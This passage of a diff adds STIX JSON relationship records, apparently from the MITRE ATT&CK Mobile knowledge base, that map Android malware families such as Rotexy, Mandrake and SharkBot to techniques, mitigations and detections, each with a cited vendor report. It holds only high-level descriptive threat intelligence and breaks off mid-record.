"relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956", + "created": "2020-11-24T17:55:12.873Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:56.899Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has communicated with the C2 using HTTP requests or WebSockets as a backup.(Citation: Talos GPlayed) ", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0f949bc5-9f6a-4ec8-a29a-87e309aa08a2", + "created": "2020-12-24T22:04:28.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:20:48.937Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has modified or configured proxy information.(Citation: Lookout Uyghur Campaign) ", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c00031dd-0466-4fd2-9724-ab1c04232bad", + "created": "2023-03-20T18:44:40.722Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:40.722Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--86afe8cc-6d6d-4952-8fee-619e95d53a7f", + "created": "2022-04-06T13:39:39.883Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:39:39.883Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "target_ref": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--73d22490-4043-42d7-ad25-74e4a642bf6a", + "created": "2023-03-20T18:41:45.186Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:45.186Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9cbc901-38cb-4895-9dfb-7a4fe10ba6d7", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "source_name": "Wandera-RedDrop" + } + ], + "modified": "2019-10-15T19:56:13.162Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) exfiltrates details of the victim device operating system and manufacturer.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9951d8c0-d210-4776-808b-421b613f244f", + "created": "2019-09-23T13:36:08.463Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:55:41.638Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) hides its icon after first launch.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aa5877fd-ef7d-435e-86af-c427f086b3c5", + "created": "2019-08-08T18:47:57.655Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Android 10 Privacy Changes", + "url": "https://developer.android.com/about/versions/10/privacy/changes#clipboard-data", + "description": "Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 introduced changes to prevent applications from accessing clipboard data if they are not in the foreground or set as the device’s default IME.(Citation: Android 10 Privacy Changes) ", + "modified": "2022-04-01T16:35:38.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--734fa2bf-17af-4e54-8d83-4cf9759e4ba9", + "type": "relationship", + "created": "2020-09-11T15:52:12.520Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-09-11T15:52:12.520Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can block, forward, hide, and send SMS messages.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--603df08f-22d3-4418-9151-4b3a3c9c7c24", + "created": "2023-03-15T16:40:37.553Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:40:37.553Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--23a67f24-a8eb-4e31-acf1-11cb5e9f88b2", + "created": "2023-01-18T19:57:13.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:43:35.115Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use Accessibility Services to detect which process is in the foreground.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--97158eda-5092-4939-8b5c-1ef5ab918089", + "type": "relationship", + "created": "2020-04-24T15:12:11.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:12:11.189Z", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) can collect device photos.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--26bf27dc-f65d-477d-abbd-f4c3ce475c51", + "created": "2022-04-01T12:37:17.515Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "OS feature updates often enhance security and privacy around permissions. ", + "modified": "2022-04-01T12:37:17.515Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ab18ee61-f94a-411c-9893-941714ce713e", + "created": "2023-03-20T18:44:26.642Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:26.642Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bb34aff0-9af9-463b-a1aa-7f5ec7b84630", + "created": "2020-07-15T20:20:59.300Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can manipulate visual components to trick the user into granting dangerous permissions, and can use phishing overlays and JavaScript injection to capture credentials.(Citation: Bitdefender Mandrake)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--62cc60d9-1581-4a0f-b7e2-a18d386511e6", + "created": "2022-03-30T13:48:43.977Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can typically detect jailbroken or rooted devices. ", + "modified": "2022-03-30T13:48:43.977Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a8bf6bbd-88f0-4725-ba4f-3b9317dca388", + "created": "2022-03-30T20:36:18.656Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Attestation can typically detect rooted devices. For MDM-enrolled devices, action can be taken if a device fails an attestation check. ", + "modified": "2022-03-30T20:36:18.656Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--276bfd69-33cc-4665-8aa7-72bed65d01f9", + "created": "2023-02-28T21:42:52.037Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:25:22.438Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can request location permissions.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--418168ad-fee9-42c8-ac27-11f7472a5f86", + "created": "2019-09-03T19:45:48.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:09:08.738Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) One checks in with the command and control server using HTTP POST requests.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--557e6d99-d7d8-4e2f-bc01-66b0754de089", + "created": "2022-03-28T19:41:27.610Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Application developers should be cautious when selecting third-party libraries to integrate into their application.", + "modified": "2022-03-28T19:41:27.610Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6b41d649-bcd0-4427-baa1-15a145bace6e", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.642Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) downloads and executes root exploits from a remote server.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6", + "created": "2020-01-21T14:20:50.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender - Triout 2018", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020.", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:46:20.857Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) includes code to hide its icon, but the function does not appear to be called in an analyzed version of the software.(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3272111a-f31d-47d5-a266-1749255b5016", + "created": "2019-09-23T13:36:08.335Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can be controlled through SMS messages.(Citation: securelist rotexy 2018)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2a472430-c30e-4877-8933-2e75f1de9a01", + "created": "2022-03-30T14:00:45.120Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T14:00:45.120Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e083305c-49e7-4c87-aae8-9689213bffbe", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2e797961-356f-4763-bdb2-0ebc2ad4c8b0", + "created": "2019-09-04T20:01:42.722Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Enterprise policies should block access to the Android Debug Bridge (ADB) by preventing users from enabling USB debugging on Android devices unless specifically needed (e.g., if the device is used for application development). An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features. ", + "modified": "2022-04-01T13:32:19.919Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7defdb15-65d1-40ca-a9da-5c0484892484", + "created": "2020-04-24T17:46:31.616Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can be controlled via encrypted SMS message.(Citation: SecurityIntelligence TrickMo)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7ee49e53-e75d-4e65-a71f-79919ebb08f4", + "type": "relationship", + "created": "2020-04-08T15:41:19.340Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2020-04-08T18:55:29.238Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can use its ransomware module to encrypt device data and hold it for ransom.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a25d58af-dbb3-4025-b91d-898c6adffcb3", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + } + ], + "modified": "2019-10-10T15:18:51.121Z", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) steals authentication tokens that can be used to access data from multiple Google applications.(Citation: Gooligan Citation)", + "relationship_type": "uses", + "source_ref": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4f366c8c-9c70-44ed-baa8-d433d5dbfe49", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. 